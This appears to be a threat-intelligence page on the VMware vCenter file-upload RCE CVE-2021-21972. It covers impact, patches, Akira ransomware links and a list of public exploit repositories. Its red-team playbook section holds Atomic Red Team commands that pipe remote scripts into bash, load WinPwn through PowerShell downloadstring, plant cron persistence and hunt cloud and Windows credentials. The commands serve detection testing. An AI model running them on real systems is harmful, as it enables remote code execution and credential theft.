CVE-2021-21972
Overview
This vulnerability is a remote code execution flaw caused by improper input validation in a vCenter Server plugin used by the vSphere Client (HTML5). The root cause is an arbitrary file upload mechanism that allows an attacker to write files to the underlying operating system. The affected component is the vCenter Server plugin accessible via HTTPS on port 443, which fails to restrict malicious payload uploads.
Vulnerability Description
The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
Impact
An attacker with network access to the vCenter Server's HTTPS port can execute arbitrary commands on the underlying operating system with unrestricted privileges without any authentication or user interaction. This enables full system compromise, allowing data exfiltration, manipulation of virtual infrastructure, and lateral movement within the environment. The vulnerability can lead to complete control over the affected virtual infrastructure management platform, severely impacting business continuity and confidentiality.
Solution
Apply the updates provided in VMware Security Advisory VMSA-2021-0002 for VMware vCenter Server versions 7.0 U1c, 6.7 U3l, and 6.5 U3n, as well as VMware Cloud Foundation versions 4.2 and 3.10.1.2 or later. Detailed patch instructions and version-specific guidance are available at https://www.vmware.com/security/advisories/VMSA-2021-0002.html. Follow the vendor’s recommended upgrade path to remediate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
akira
|
1529 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the vSphere Client (HTML5) presents a significant risk due to its nature as a remote code execution flaw within a vCenter Server plugin. This issue arises from improper validation of user input, allowing an attacker with network access to port 443 to send crafted requests that the server processes without adequate checks. As a result, the attacker can execute arbitrary commands with unrestricted privileges on the underlying operating system hosting the vCenter Server. This vulnerability affects multiple versions of VMware vCenter Server and VMware Cloud Foundation, creating a broad attack surface for potential exploitation.
Attack vectors for this vulnerability are particularly concerning due to the requirement for network access to a specific port, which is commonly exposed in enterprise environments. An attacker could leverage this access to launch a targeted attack, potentially gaining control over the entire virtualized infrastructure managed by the vCenter Server. Exploitation scenarios may include deploying malicious payloads, altering configurations, or even pivoting to other systems within the network. Given the privileges associated with the vCenter Server, the impact of a successful attack could be catastrophic, leading to data breaches, service disruptions, or complete operational paralysis.
The real-world impact of this vulnerability extends beyond immediate technical concerns; it poses substantial business risks as well. Organizations relying on VMware products for their virtualization infrastructure could face significant downtime, loss of data integrity, and reputational damage if exploited. The financial implications of such incidents can be severe, including costs associated with incident response, recovery efforts, and potential regulatory fines, particularly in industries subject to stringent data protection regulations. Additionally, the potential for data exfiltration or ransomware deployment could further exacerbate the situation, leading to long-term consequences for affected organizations.
To detect and mitigate this vulnerability, organizations should adopt a multi-layered approach. Regular vulnerability assessments and penetration testing can help identify exposure to this flaw, while maintaining an up-to-date inventory of all software versions is crucial for effective patch management. VMware has released patches for the affected versions, and organizations must prioritize applying these updates to mitigate the risk. Additionally, implementing network segmentation to restrict access to critical services like vCenter Server can reduce the attack surface and limit the potential for exploitation. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of attempted exploits.
In conclusion, the remote code execution vulnerability within the vSphere Client represents a critical threat to organizations utilizing VMware products. The potential for exploitation, combined with the severe consequences of a successful attack, necessitates immediate attention from cybersecurity professionals. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, organizations can better safeguard their virtualized environments against this and similar vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2021-21972, driven by the emergence of multiple new public proof-of-concept exploits and the release of a Metasploit module that significantly lowers the technical barrier for attackers. This expansion of the exploit landscape is compounded by the vulnerability’s recent inclusion in the CISA KEV catalog, underscoring its prioritization for remediation. Our telemetry also indicates a notable association with ransomware actors, specifically the Akira group, which elevates the operational risk by linking exploitation attempts to financially motivated campaigns. The EPSS score nearing certainty reflects the high likelihood of active exploitation in the wild. Collectively, these developments elevate the threat level from theoretical to imminent, signaling that defenders must anticipate increased targeting of VMware vCenter Server environments and heightened risk of severe operational impact.
Update 2 — July 08, 2026
CSURFACE threat intelligence has detected a modest uptick in exploitation attempts targeting CVE-2021-21972, reflected by a discernible increase in telemetry signals. This escalation, while not rapid, underscores sustained adversary interest and operational activity exploiting this critical vulnerability. Concurrently, the availability of multiple new proof-of-concept exploits on public repositories has lowered the technical barrier for threat actors, potentially broadening the attacker base. The continued association with financially motivated ransomware groups, notably Akira, reinforces the likelihood that exploitation attempts are increasingly leveraged within ransomware campaigns, amplifying the operational risk to affected VMware vCenter Server environments. Although the EPSS score remains stable near certainty, this incremental rise in exploitation indicators signals a persistent and evolving threat landscape. Defenders should interpret this as a confirmation of ongoing targeting rather than an isolated or diminishing risk, warranting heightened vigilance and prioritization of detection capabilities.
Affected Products (43)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
VMware vCenter Server Unauthenticated OVA File Upload RCE
exploits/multi/http/vmware_vcenter_uploadova_rce
|
Mikhail Klyuchnikov, wvu, mr_me +1 | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) | CHackA0101 | webapps | multiple | - | View |
| VMware vCenter Server 7.0 - Unauthenticated File Upload | Photubias | webapps | multiple | - | View |
GitHub PoCs (27)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Schira4396/VcenterKiller
一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以...
|
Schira4396 | 1476 | 166 | 2022-10-04 | View |
|
NS-Sp4ce/CVE-2021-21972
CVE-2021-21972 Exploit
|
NS-Sp4ce | 501 | 140 | 2021-02-24 | View |
|
horizon3ai/CVE-2021-21972
Proof of Concept Exploit for vCenter CVE-2021-21972
|
horizon3ai | 270 | 83 | 2021-02-24 | View |
|
QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
|
QmF0c3UK | 137 | 61 | 2021-02-24 | View |
|
psc4re/NSE-scripts
NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473
|
psc4re | 162 | 29 | 2020-03-11 | View |
|
alt3kx/CVE-2021-21972
|
alt3kx | 54 | 15 | 2021-02-25 | View |
|
milo2012/CVE-2021-21972
CVE-2021-21972
|
milo2012 | 33 | 8 | 2021-02-25 | View |
|
conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972
VMware vCenter 未授权RCE(CVE-2021-21972)
|
conjojo | 28 | 5 | 2021-02-25 | View |
|
GuayoyoCyber/CVE-2021-21972
Nmap script to check vulnerability CVE-2021-21972
|
GuayoyoCyber | 28 | 4 | 2021-02-26 | View |
|
TaroballzChen/CVE-2021-21972
CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script
|
TaroballzChen | 19 | 6 | 2021-03-07 | View |
|
B1anda0/CVE-2021-21972
VMware vCenter Server远程代码执行漏洞 (CVE-2021-21972)批量检测脚本
|
B1anda0 | 11 | 9 | 2021-02-25 | View |
|
orangmuda/CVE-2021-21972
CVE-2021-21972 – ᴠᴍᴡᴀʀᴇ ᴄʟɪᴇɴᴛ ᴜɴᴀᴜᴛʜᴏʀɪᴢᴇᴅ ᴄᴏᴅᴇ ɪɴᴊᴇᴄᴛɪᴏɴ (ʀᴄᴇ)
|
orangmuda | 10 | 4 | 2021-10-03 | View |
|
Ma1Dong/vcenter_rce
漏洞利用,Vmware vCenter 6.5-7.0 RCE(CVE-2021-21972),上传冰蝎3,getshell
|
Ma1Dong | 11 | 3 | 2021-03-01 | View |
|
yaunsky/CVE-2021-21972
|
yaunsky | 8 | 4 | 2021-02-24 | View |
|
murataydemir/CVE-2021-21972
[CVE-2021-21972] VMware vSphere Client Unauthorized File Upload to Remote Code Execution (RCE)
|
murataydemir | 6 | 1 | 2021-04-06 | View |
|
haidv35/CVE-2021-21972
|
haidv35 | 3 | 2 | 2021-07-26 | View |
|
pettyhacks/vSphereyeeter
POC exploit for CVE-2021-21972
|
pettyhacks | 3 | 1 | 2021-04-22 | View |
|
ByZain/CVE-2021-21972
CVE-2021-21972 related vulnerability code
|
ByZain | 3 | 0 | 2021-03-04 | View |
|
renini/CVE-2021-21972
CVE-2021-21972
|
renini | 2 | 0 | 2021-02-25 | View |
|
Osyanina/westone-CVE-2021-21972-scanner
A vulnerability scanner that detects CVE-2021-21972 vulnerabilities.
|
Osyanina | 1 | 1 | 2021-02-25 | View |
|
d3sh1n/cve-2021-21972
|
d3sh1n | 0 | 1 | 2021-03-03 | View |
|
TAI-REx/CVE-2021-21972
CVE-2021-21972 vCenter-6.5-7.0 RCE POC
|
TAI-REx | 0 | 1 | 2021-09-12 | View |
|
L-pin/CVE-2021-21972
|
L-pin | 1 | 0 | 2021-02-25 | View |
|
robwillisinfo/VMware_vCenter_CVE-2021-21972
VMware vCenter CVE-2021-21972 Tools
|
robwillisinfo | 1 | 0 | 2021-02-27 | View |
|
JMousqueton/Detect-CVE-2021-21972
|
JMousqueton | 0 | 0 | 2021-02-27 | View |
|
user16-et/cve-2021-21972_PoC
|
user16-et | 0 | 0 | 2022-05-16 | View |
|
SimoesCTT/CTT-enhanced-VMware-vCenter
Looking at current high-impact vulnerabilities, let's use the VMware vCenter Server CVE-2021-21972 (CVSS 9.8) as our bas...
|
SimoesCTT | 0 | 0 | 2026-01-27 | View |
Ransomware Groups 1
Threat Feed
13 eventsSighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-21972 |
| vmware.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.vmware.com/security/advisories/VMSA-2021-0002.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/161695/VMware-vCenter-Server-File-Upload-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163268/VMware-vCenter-6.5-6.7-7.0-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21972 |